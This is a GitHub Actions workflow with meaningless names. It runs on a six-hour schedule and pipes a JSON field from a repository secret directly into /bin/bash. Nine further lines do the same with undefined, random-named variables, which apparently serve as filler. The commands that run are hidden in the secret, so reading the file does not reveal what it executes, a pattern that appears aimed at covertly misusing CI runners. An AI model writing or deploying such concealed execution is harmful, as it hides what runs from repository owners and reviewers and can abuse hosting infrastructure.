name: meilitong3214

on:
  workflow_dispatch:
  schedule:
    - cron: '28 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: meilitong3214
        env:
          gs64: ${{ secrets.gs64 }}
        run: |
          echo $gs64 | jq -r .ktrp6901 | /bin/bash
          echo $bdeu19999 | jq -r .fe4 | /bin/bash
          echo $oedxq5150 | jq -r .bhors80 | /bin/bash
          echo $f06461 | jq -r .z4 | /bin/bash
          echo $rxe44 | jq -r .qcur92 | /bin/bash
          echo $boh256 | jq -r .kkm17568 | /bin/bash
          echo $hwgl8 | jq -r .ymo89758 | /bin/bash
          echo $ffqi9503 | jq -r .kvg7779 | /bin/bash
          echo $guji37945 | jq -r .zpcye2216 | /bin/bash
          echo $sq4 | jq -r .ys7560 | /bin/bash

